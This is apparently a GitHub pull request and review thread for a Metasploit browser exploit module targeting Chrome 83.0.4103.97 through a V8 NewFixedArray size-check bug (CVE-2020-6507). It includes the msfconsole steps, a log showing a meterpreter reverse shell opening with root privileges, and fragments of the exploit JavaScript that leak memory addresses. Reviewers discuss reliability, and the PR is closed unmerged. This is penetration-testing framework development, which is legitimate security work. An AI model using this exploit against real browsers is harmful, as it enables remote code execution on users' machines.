### PR TITLE
Add exploit for Chrome version 83.0.4103.97

### PR DESCRIPTION
**Pull request by r4j0x00**
## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_newfixedarray_sizecheck`
- [ ] `set uripath /`
- [ ] `set lhost 127.0.0.1`
- [ ] `set srvhost 127.0.0.1`
- [ ] `exploit`
- [ ] Visit the URL with Chrome
- [ ] **Verify** you get a meterpreter shell.

e.g:
```
msf5 > use exploit/multi/browser/chrome_newfixedarray_sizecheck 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
msf5 exploit(multi/browser/chrome_newfixedarray_sizecheck) > [*] Using URL: http://127.0.0.1:8080/
[*] Server started.
[*] 127.0.0.1        chrome_newfixedarray_sizecheck - Sending / to Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
[*] Sending stage (3012516 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:35280) at 2020-08-27 19:23:10 +0530
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: no-user @ kali (uid=0, gid=0, euid=0, egid=0)
```

### CODE REVIEW

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb [hunk 1]
```diff
@@ -0,0 +1,196 @@
...
+wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
+document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+	rwx_addr >>= 32n;
+	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
```
Comment (timwr) [inline modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb:177]: Minor thing: you should either remove all this logging or turn it into debug logging, e.g:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb#L354

**Comment by timwr** [comment]
Excellent work @r4j0x00 !

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb (hunk 1 above)
Comment (r4j0x00) [reply modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb]: done

**Comment by xaitax** [comment]
@r4j0x00 Do you have the .deb package for that version for it so I can test it?

**Comment by r4j0x00** [comment]
@xaitax you can get the linux build here - https://chromium.cypress.io/linux/stable/83.0.4103.97
@timwr also tested it for osx and it works with that.

**Comment by xaitax** [comment]
@r4j0x00 Thanks a lot. Got it to work on a `Ubuntu 20.04.1` with `Chromium 83.0.4103.0`. 
Success rate in my tests is a bit lower unfortunately: `7/20`
Very nice though.

**Comment by timwr** [comment]
I gave this a quick test on OSX and it worked maybe 5/10 times:
https://github.com/r4j0x00/metasploit-framework/compare/chrome_newfixedarray...timwr:pr-14060?expand=1
You can get the .dmg from: https://google-chrome.en.uptodown.com/mac/download/2245134

I wonder if reliability can be improved with an iframe that retries the exploit on failure.

**Comment by bwatters-r7** [comment]
I'm thinking it might be a good idea to move the javascript over to a standalone file in the data/exploit directory....  That would make the module a bit easier to read.

**Comment by bwatters-r7** [comment]
@r4j0x00 any progress on the documentation?

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb [hunk 2]
```diff
@@ -0,0 +1,192 @@
...
+      must be run with the --no-sandbox option for the payload to work correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Sergei Glazunov', # discovery
+          'Rajvardhan Agarwal (r4j)', # exploit
+        ],
+      'References'     => [
+          ['URL', 'https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-exploit'],
```
Comment (space-r7) [inline modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb:33]: Is there a CVE available for this?

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb [hunk 3]
```diff
@@ -0,0 +1,192 @@
...
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 83 Missing size check in NewFixedArray',
+      'Description'    => %q{
+      This module exploits an issue in Google Chrome 83.0.4103.97 (64 bit). The exploit
+      makes use of a missing size check in NewFixedArray and abuses it to create a
+      JSArray with an invalid length. This is abused to gain arbitrary read/write into
+      the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary
```
Comment (space-r7) [inline modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb:19]:
```suggestion
      the isolated region. Then an ArrayBuffer can be used to achieve absolute arbitrary
```

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb (hunk 2 above)
Comment (r4j0x00) [reply modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb:33]: There isn't

**Review by space-r7 — COMMENTED** [review]
Hey @r4j0x00, thanks for you module! I've just a couple of suggestions. Please add some documentation when you get the chance. Thanks!

File: modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb (hunk 3 above)
Comment (r4j0x00) [reply modules/exploits/multi/browser/chrome_newfixedarray_sizecheck.rb:19]: It is not "isolated region" the v8 heap is known as isolate root.

**Comment by r4j0x00** [comment]
update: there's a cve for it now CVE-2020-6507

**Comment by r4j0x00** [comment]
The exploit success rate is now 9/10 times.

**Comment by timwr** [comment]
I can merge this later this week, apologies for the delay!

**Comment by timwr** [comment]
@r4j0x00 this was extremely unreliable during my testing and I can no longer get a session from it. Can you test it with msf and ensure you get a session?

**Comment by gwillcox-r7** [comment]
@r4j0x00 Just checking in, any update on this r.e @timwr's comment?

**Comment by gwillcox-r7** [comment]
I'm going to put this in the attic for now as whilst its a very nice module, I've not heard anything from @r4j0x00 r.e updates to address the reliability issues and generally speaking anything below 50% reliability we generally don't tend to merge in. @r4j0x00 If you are able to improve the reliability of this exploit though, then please feel free to continue contributing and we will reopen this PR.

**Pull request closed without merging**